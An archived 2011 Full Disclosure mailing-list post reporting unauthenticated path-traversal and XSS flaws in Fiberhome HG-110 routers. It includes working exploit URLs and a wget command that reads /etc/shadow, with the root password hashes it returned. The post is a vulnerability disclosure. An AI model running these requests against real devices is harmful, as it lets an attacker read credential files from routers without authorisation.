Full Disclosure mailing list archives
Re: Fiberhome HG-110 (adsl/router) vulnerabilities
From: "Zerial." <fernando () zerial org>
Date: Sun, 10 Apr 2011 05:41:31 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 You can include /etc/shadow: $ wget -o /dev/null -O - "http://192.168.1.1:8000/cgi-bin /webproc?getpage=../../../../../../../../../../../../etc/shadow& var:menu=advanced&var:page=dns" #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: "httpd" process are running as root: ~ $ ps ax|grep httpd 509 root 4212 SW /usr/sbin/mini_httpd -d /usr/www -c /cgi-bin/* -u roo ~ $ On 04/08/11 10:30, Zerial. wrote:
I found two vulnerabilities on fiberhome hg-110 routers[1] and has not been reported nor fixed. XSS: - http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns Local File Include and Directory/Path Traversal: - http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns URLs are accessible without authentication. Device info: - HardwareVersion : HG110_BH_R1A - SoftwareVersion : HG110_BH_V1.6 - Firmware Version : 1.0.0 This vulnerabilities can affect to other version and models of this vendor. [1] http://www.minuevohogar.cl/wp-content/uploads/2011/03/Imagen-8.png
- -- Zerial Seguridad Informatica GNU/Linux User #382319 Blog: http://blog.zerial.org Jabber: zerial () jabberes org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk2hbToACgkQIP17Kywx9JTzmgCdFhSbDXenCm/EoGxOzQzrSvuf h4MAmweTe4P8CVmaewUri9B4H3ruqwjp =cEzg -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Fiberhome HG-110 (adsl/router) vulnerabilities Zerial. (Apr 08)
- Re: Fiberhome HG-110 (adsl/router) vulnerabilities Zerial. (Apr 10)